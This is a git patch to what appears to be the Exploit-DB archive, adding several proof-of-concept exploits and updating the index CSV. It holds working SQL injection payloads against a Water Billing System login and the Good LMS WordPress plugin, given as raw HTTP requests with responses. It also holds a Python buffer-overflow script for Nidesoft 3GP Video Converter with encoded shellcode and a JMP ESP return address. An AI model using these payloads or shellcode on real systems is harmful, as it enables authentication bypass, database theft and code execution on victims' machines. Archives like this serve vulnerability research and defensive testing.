From ccc8fe23315dfdd408fb4153c0693c3a2ead4432 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Fri, 13 Nov 2020 05:01:58 +0000
Subject: [PATCH] DB: 2020-11-13

7 changes to exploits/shellcodes

Nidesoft 3GP Video Converter 2.6.18 - Local Stack Buffer Overflow

WordPress Plugin Simple File List 5.4 - Arbitrary File Upload
WordPress Plugin Simple File List 4.2.2 - Arbitrary File Upload
Water Billing System 1.0 - 'username' and 'password' parameters SQL Injection
Wordpress Plugin Good LMS 2.1.4 - 'id' Unauthenticated SQL Injection

WordPress Plugin Simple File List 5.4 - Remote Code Execution

WordPress Plugin Simple File List 4.2.2 - Remote Code Execution
---
 exploits/php/webapps/{48349.py => 48449.py} |  6 +-
 exploits/php/webapps/48979.py               |  2 +-
 exploits/php/webapps/49032.txt              | 71 +++++++++++++++++++++
 exploits/php/webapps/49033.txt              | 71 +++++++++++++++++++++
 exploits/windows/local/49034.py             | 65 +++++++++++++++++++
 files_exploits.csv                          |  7 +-
 6 files changed, 216 insertions(+), 6 deletions(-)
 rename exploits/php/webapps/{48349.py => 48449.py} (92%)
 create mode 100644 exploits/php/webapps/49032.txt
 create mode 100644 exploits/php/webapps/49033.txt
 create mode 100755 exploits/windows/local/49034.py

diff --git a/exploits/php/webapps/48349.py b/exploits/php/webapps/48449.py
similarity index 92%
rename from exploits/php/webapps/48349.py
rename to exploits/php/webapps/48449.py
index 97aa87f96..853ea5da2 100755
--- a/exploits/php/webapps/48349.py
+++ b/exploits/php/webapps/48449.py
@@ -1,9 +1,9 @@
-# Exploit Title: Wordpress Plugin Simple File List 5.4 - Remote Code Execution
-# Date: 2020-04-2019
+# Exploit Title: Wordpress Plugin Simple File List 4.2.2 - Remote Code Execution
+# Date: 2020-04-19
 # Exploit Author: coiffeur
 # Vendor Homepage: https://simplefilelist.com/
 # Software Link: https://wordpress.org/plugins/simple-file-list/
-# Version: Wordpress v5.4 Simple File List v4.2.2
+# Version: Wordpress Simple File List <= v4.2.2
 
 import requests
 import random
diff --git a/exploits/php/webapps/48979.py b/exploits/php/webapps/48979.py
index 6381bf6f5..2b4e7b214 100755
--- a/exploits/php/webapps/48979.py
+++ b/exploits/php/webapps/48979.py
@@ -1,6 +1,6 @@
 #!/usr/bin/python
 # -*- coding: utf-8 -*-
-# Exploit Title: Wordpress Plugin Simple File List 5.4 - Arbitrary File Upload
+# Exploit Title: Wordpress Plugin Simple File List 4.2.2 - Arbitrary File Upload
 # Date: 2020-11-01
 # Exploit Author: H4rk3nz0 based off exploit by coiffeur
 # Original Exploit: https://www.exploit-db.com/exploits/48349
diff --git a/exploits/php/webapps/49032.txt b/exploits/php/webapps/49032.txt
new file mode 100644
index 000000000..19a8f14f7
--- /dev/null
+++ b/exploits/php/webapps/49032.txt
@@ -0,0 +1,71 @@
+# Exploit Title: Water Billing System 1.0 - 'username' and 'password' parameters SQL Injection
+# SQL Injection in  'username' and 'password' parameters allows attacker to run the SQL commands on the victim to extract entire DB. In advanced exploitation, an attacker can run the arbitrary code on the victim system to compromise it...
+# Exploit Author: Sarang Tumne (CyberInsane)
+# Date: 4th Nov, 2020
+# Confirmed on release 1.0
+# Tested on: Windows Server 2016- XAMPP
+# Vendor: https://www.sourcecodester.com/php/14560/water-billing-system-phpmysqli-full-source-code.html
+###############################################
+
+POST /wbs/process.php HTTP/1.1
+Host: 192.168.56.102:8080
+Content-Length: 45
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://192.168.56.102:8080
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://192.168.56.102:8080/wbs/
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+username='%20or%200%3d0%20#&password=password
+
+Response:
+
+HTTP/1.1 200 OK
+Date: Mon, 02 Nov 2020 04:30:51 GMT
+Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.2.30
+X-Powered-By: PHP/7.2.30
+Set-Cookie: PHPSESSID=4q8t10sshr36he7sl19hb563a0; path=/
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Content-Length: 48
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+<script>windows: location="billing.php"</script>
+=========================================================================
+POST /wbs/process.php HTTP/1.1
+Host: 192.168.56.102:8080
+Content-Length: 48
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://192.168.56.102:8080
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://192.168.56.102:8080/wbs/
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+username=admin&password=a'%20or%20'a'%20%3d%20'a
+
+Response:
+HTTP/1.1 200 OK
+Date: Mon, 02 Nov 2020 04:30:49 GMT
+Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.2.30
+X-Powered-By: PHP/7.2.30
+Set-Cookie: PHPSESSID=34a478h4bhtliatg8l71kmp10r; path=/
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Content-Length: 48
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+<script>windows: location="billing.php"</script>
\ No newline at end of file
diff --git a/exploits/php/webapps/49033.txt b/exploits/php/webapps/49033.txt
new file mode 100644
index 000000000..a1c8af3f4
--- /dev/null
+++ b/exploits/php/webapps/49033.txt
@@ -0,0 +1,71 @@
+# Exploit Title: Wordpress Plugin Good LMS 2.1.4 - 'id' Unauthenticated SQL Injection
+# Software Link: https://codecanyon.net/item/good-lms-learning-management-system-wp-plugin/9033850
+# Version: <= 2.1.4
+# Dork: N/A
+# Author: Abdulazeez Alaseeri
+# Tested on: linux/apache
+# Type: Web App
+# Date: 2020-11-12
+# Category: Web App
+
+
+================================================================
+Unauthenticated SQL Injection in Good Layers LMS Plugin <= 2.1.4
+================================================================
+
+Plugin URL: https://codecanyon.net/item/good-lms-learning-management-system-wp-plugin/9033850
+
+Following is the vulnerable code in file "goodlayers-lms/include/lightbox-form.php" from line 682 to 701
+================================================================
+Start Vulnerable Code
+================================================================
+682-	add_action( 'wp_ajax_gdlr_lms_cancel_booking', 'gdlr_lms_cancel_booking' );
+683-	add_action( 'wp_ajax_nopriv_gdlr_lms_cancel_booking', 'gdlr_lms_cancel_booking' );
+684-	function gdlr_lms_cancel_booking(){
+685-		global $wpdb;
+686-
+687-		$sql  = 'SELECT * FROM ' . $wpdb->prefix . 'gdlrpayment ';
+688-		$sql .= 'WHERE id=' . $_POST['id'] . ' AND ';
+689-		$sql .= '(payment_status=\'pending\' OR payment_status=\'submitted\' OR payment_status=\'reserved\')';
+690-		$booked_course = $wpdb->get_row($sql);
+691-		if( !empty($booked_course) ){
+692-			$payment_info = unserialize($booked_course->payment_info);
+693-
+694-			$course_options = gdlr_lms_get_course_options($booked_course->course_id);
+695-			$course_options['booked-seat'] = intval($course_options['booked-seat']) - intval($payment_info['amount']);
+696-			update_post_meta($booked_course->course_id, 'gdlr-lms-course-settings', wp_slash(json_encode($course_options, JSON_UNESCAPED_UNICODE)));
+697-
+698-			$wpdb->delete( $wpdb->prefix . 'gdlrpayment', array('id'=>$_POST['id']), array('%d'));
+699-		}
+700-		die("");
+701-	}
+================================================================
+End Vulnerable Code
+================================================================
+Line 682 means that function "gdlr_lms_cancel_booking" can be called using "/wp-admin/admin-ajax.php" by having any low privileged account such as subscriber or contributor. However the "nopriv" in line 683 means that the same function "gdlr_lms_cancel_booking" can also be called as an unauthenticated user. Following URL means that an attacker is already inside function "gdlr_lms_cancel_booking".
+
+http://www.example.com/wp-admin/admin-ajax.php?action=gdlr_lms_cancel_booking
+
+SQL Injection on line 688 is pretty simple to understand that an arbitrary user input in POST Request is sent straight into the MySQL Query as variable "id"
+
+$sql .= 'WHERE id=' . $_POST['id'] . ' AND ';
+
+Following are the Request Headers as POC which demonstrates MySQL SLEEP Query.
+
+================================================================
+Request Headers Start
+================================================================
+POST /wp-admin/admin-ajax.php HTTP/1.1
+Host: example.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+
+action=gdlr_lms_cancel_booking&id=(SELECT 1337 FROM (SELECT(SLEEP(10)))MrMV)
+================================================================
+Request Headers Finish
+================================================================
\ No newline at end of file
diff --git a/exploits/windows/local/49034.py b/exploits/windows/local/49034.py
new file mode 100755
index 000000000..9f03d7785
--- /dev/null
+++ b/exploits/windows/local/49034.py
@@ -0,0 +1,65 @@
+# Exploit Title: Nidesoft 3GP Video Converter 2.6.18 - Local Stack Buffer Overflow
+# Date: 2020-07-30
+# Author: Felipe Winsnes
+# Software Link: http://www.nidesoft.com/downloads/3gp-video-converter.exe
+# Version: 2.6.18
+# Tested on: Windows 7 (x86)
+
+# Blog: https://whitecr0wz.github.io/
+
+# Proof of Concept:
+# 1.- Run the python script, it will create the file "poc.txt".
+# 2.- Copy the content of the new file "poc.txt" to clipboard.
+# 3.- Open the application.
+# 4.- Paste the clipboard into the "License Code" parameter within registration.
+# 5.- Profit.
+
+import struct
+
+# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread 
+# Payload size: 448 bytes
+
+buf =  b""
+buf += b"\x89\xe3\xdb\xd3\xd9\x73\xf4\x5e\x56\x59\x49\x49\x49"
+buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
+buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
+buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
+buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x48\x68\x6d"
+buf += b"\x52\x43\x30\x57\x70\x33\x30\x65\x30\x6c\x49\x78\x65"
+buf += b"\x70\x31\x6f\x30\x51\x74\x6e\x6b\x50\x50\x34\x70\x6c"
+buf += b"\x4b\x73\x62\x76\x6c\x4c\x4b\x52\x72\x45\x44\x6e\x6b"
+buf += b"\x44\x32\x71\x38\x56\x6f\x6e\x57\x32\x6a\x31\x36\x55"
+buf += b"\x61\x49\x6f\x6e\x4c\x45\x6c\x30\x61\x61\x6c\x53\x32"
+buf += b"\x54\x6c\x47\x50\x6a\x61\x78\x4f\x74\x4d\x53\x31\x69"
+buf += b"\x57\x6a\x42\x4b\x42\x43\x62\x53\x67\x6c\x4b\x50\x52"
+buf += b"\x52\x30\x6c\x4b\x50\x4a\x55\x6c\x4e\x6b\x42\x6c\x36"
+buf += b"\x71\x44\x38\x5a\x43\x30\x48\x73\x31\x6a\x71\x63\x61"
+buf += b"\x6e\x6b\x56\x39\x35\x70\x37\x71\x68\x53\x4c\x4b\x71"
+buf += b"\x59\x35\x48\x58\x63\x74\x7a\x32\x69\x4c\x4b\x65\x64"
+buf += b"\x4c\x4b\x77\x71\x4a\x76\x65\x61\x79\x6f\x4e\x4c\x4b"
+buf += b"\x71\x48\x4f\x46\x6d\x67\x71\x78\x47\x37\x48\x39\x70"
+buf += b"\x72\x55\x39\x66\x45\x53\x61\x6d\x38\x78\x37\x4b\x73"
+buf += b"\x4d\x77\x54\x32\x55\x6d\x34\x63\x68\x6e\x6b\x30\x58"
+buf += b"\x45\x74\x65\x51\x6e\x33\x51\x76\x6c\x4b\x64\x4c\x72"
+buf += b"\x6b\x6c\x4b\x63\x68\x67\x6c\x47\x71\x4b\x63\x6c\x4b"
+buf += b"\x43\x34\x6e\x6b\x77\x71\x7a\x70\x4d\x59\x73\x74\x47"
+buf += b"\x54\x74\x64\x53\x6b\x51\x4b\x61\x71\x51\x49\x30\x5a"
+buf += b"\x73\x61\x6b\x4f\x79\x70\x61\x4f\x43\x6f\x70\x5a\x4c"
+buf += b"\x4b\x77\x62\x5a\x4b\x4e\x6d\x71\x4d\x72\x4a\x53\x31"
+buf += b"\x4e\x6d\x4c\x45\x6c\x72\x33\x30\x65\x50\x37\x70\x76"
+buf += b"\x30\x51\x78\x76\x51\x4e\x6b\x32\x4f\x6e\x67\x59\x6f"
+buf += b"\x58\x55\x6f\x4b\x49\x70\x77\x6d\x47\x5a\x75\x5a\x72"
+buf += b"\x48\x4d\x76\x6c\x55\x4f\x4d\x6f\x6d\x69\x6f\x49\x45"
+buf += b"\x57\x4c\x63\x36\x43\x4c\x54\x4a\x4f\x70\x79\x6b\x39"
+buf += b"\x70\x64\x35\x43\x35\x6f\x4b\x37\x37\x64\x53\x72\x52"
+buf += b"\x52\x4f\x61\x7a\x45\x50\x63\x63\x79\x6f\x6b\x65\x35"
+buf += b"\x33\x63\x51\x32\x4c\x61\x73\x54\x6e\x75\x35\x72\x58"
+buf += b"\x43\x55\x63\x30\x41\x41"
+
+jmpesp = struct.pack("<I", 0x66C33BEB)
+
+buffer = "A" * 4592 + jmpesp + "\x41\x49" * 5 + buf + "\xff" * 2000
+
+f = open ("poc.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 10d1379ec..0dd4711b4 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11134,6 +11134,7 @@ id,file,description,date,author,type,platform,port
 48339,exploits/windows/local/48339.py,"Easy MPEG to DVD Burner 1.7.11 - Buffer Overflow (SEH + DEP)",2020-04-17,"Bailey Belisario",local,windows,
 48344,exploits/windows/local/48344.py,"Code Blocks 16.01 - Buffer Overflow (SEH) UNICODE",2020-04-17,T3jv1l,local,windows,
 48346,exploits/windows/local/48346.py,"Atomic Alarm Clock 6.3 - Stack Overflow (Unicode+SEH)",2020-04-20,boku,local,windows,
+49034,exploits/windows/local/49034.py,"Nidesoft 3GP Video Converter 2.6.18 - Local Stack Buffer Overflow",2020-11-12,"Felipe Winsnes",local,windows,
 48350,exploits/windows/local/48350.py,"Nsauditor 3.2.1.0 - Buffer Overflow (SEH+ASLR bypass (3 bytes overwrite))",2020-04-20,Cervoise,local,windows,
 48351,exploits/windows/local/48351.py,"Rubo DICOM Viewer 2.0 - Buffer Overflow (SEH)",2020-04-20,bzyo,local,windows,
 48352,exploits/windows_x86/local/48352.txt,"Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path",2020-04-20,boku,local,windows_x86,
@@ -40822,7 +40823,7 @@ id,file,description,date,author,type,platform,port
 48976,exploits/php/webapps/48976.txt,"Online Job Portal 1.0 - 'userid' SQL Injection",2020-10-30,"Akıner Kısa",webapps,php,
 48977,exploits/php/webapps/48977.py,"Simple College Website 1.0 - 'username' SQL Injection / Remote Code Execution",2020-10-30,yunaranyancat,webapps,php,
 48978,exploits/java/webapps/48978.py,"Apache Flink 1.9.x - File Upload RCE (Unauthenticated)",2020-11-02,bigger.wing,webapps,java,
-48979,exploits/php/webapps/48979.py,"WordPress Plugin Simple File List 5.4 - Arbitrary File Upload",2020-11-02,H4rk3nz0,webapps,php,
+48979,exploits/php/webapps/48979.py,"WordPress Plugin Simple File List 4.2.2 - Arbitrary File Upload",2020-11-02,H4rk3nz0,webapps,php,
 48980,exploits/php/webapps/48980.py,"Monitorr 1.7.6m - Remote Code Execution (Unauthenticated)",2020-11-02,"Lyhin\'s Lab",webapps,php,
 48981,exploits/php/webapps/48981.py,"Monitorr 1.7.6m - Authorization Bypass",2020-11-02,"Lyhin\'s Lab",webapps,php,
 48984,exploits/php/webapps/48984.txt,"Multi Restaurant Table Reservation System 1.0 - 'table_id' Unauthenticated SQL Injection",2020-11-03,yunaranyancat,webapps,php,
@@ -40849,6 +40850,8 @@ id,file,description,date,author,type,platform,port
 49029,exploits/php/webapps/49029.txt,"Customer Support System 1.0 - Cross-Site Request Forgery",2020-11-11,"Ahmed Abbas",webapps,php,
 49030,exploits/php/webapps/49030.txt,"Customer Support System 1.0 - 'username' Authentication Bypass",2020-11-11,"Ahmed Abbas",webapps,php,
 49031,exploits/php/webapps/49031.txt,"CMSUno 1.6.2 - 'user' Remote Code Execution (Authenticated)",2020-11-11,"Fatih Çelik",webapps,php,
+49032,exploits/php/webapps/49032.txt,"Water Billing System 1.0 - 'username' and 'password' parameters SQL Injection",2020-11-12,"Sarang Tumne",webapps,php,
+49033,exploits/php/webapps/49033.txt,"Wordpress Plugin Good LMS 2.1.4 - 'id' Unauthenticated SQL Injection",2020-11-12,"Abdulazeez Alaseeri",webapps,php,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,
@@ -42965,7 +42968,6 @@ id,file,description,date,author,type,platform,port
 48345,exploits/php/webapps/48345.txt,"Centreon 19.10.5 - 'id' SQL Injection",2020-04-20,"Basim Alabdullah",webapps,php,
 48347,exploits/php/webapps/48347.txt,"Prestashop 1.7.6.4 - Cross-Site Request Forgery",2020-04-20,"Sivanesh Ashok",webapps,php,
 48348,exploits/php/webapps/48348.txt,"Fork CMS 5.8.0 - Persistent Cross-Site Scripting",2020-04-20,Vulnerability-Lab,webapps,php,
-48349,exploits/php/webapps/48349.py,"WordPress Plugin Simple File List 5.4 - Remote Code Execution",2020-04-20,coiffeur,webapps,php,
 48354,exploits/php/webapps/48354.txt,"CSZ CMS 1.2.7 - Persistent Cross-Site Scripting",2020-04-21,"Metin Yunus Kandemir",webapps,php,
 48356,exploits/php/webapps/48356.txt,"PMB 5.6 - 'logid' SQL Injection",2020-04-21,41-trk,webapps,php,
 48357,exploits/php/webapps/48357.txt,"CSZ CMS 1.2.7 - 'title' HTML Injection",2020-04-21,"Metin Yunus Kandemir",webapps,php,
@@ -43035,6 +43037,7 @@ id,file,description,date,author,type,platform,port
 48445,exploits/aspx/webapps/48445.txt,"Kartris 1.6 - Arbitrary File Upload",2020-05-11,"Nhat Ha",webapps,aspx,
 48446,exploits/php/webapps/48446.txt,"Sentrifugo CMS 3.2 - Persistent Cross-Site Scripting",2020-05-11,Vulnerability-Lab,webapps,php,
 48447,exploits/php/webapps/48447.txt,"CuteNews 2.1.2 - Arbitrary File Deletion",2020-05-11,Besim,webapps,php,
+48449,exploits/php/webapps/48449.py,"WordPress Plugin Simple File List 4.2.2 - Remote Code Execution",2020-05-11,coiffeur,webapps,php,
 48450,exploits/php/webapps/48450.txt,"OpenZ ERP 3.6.60 - Persistent Cross-Site Scripting",2020-05-11,Vulnerability-Lab,webapps,php,
 48451,exploits/php/webapps/48451.txt,"Victor CMS 1.0 - 'post' SQL Injection",2020-05-11,BKpatron,webapps,php,
 48452,exploits/php/webapps/48452.txt,"Complaint Management System 1.0 - Authentication Bypass",2020-05-11,BKpatron,webapps,php,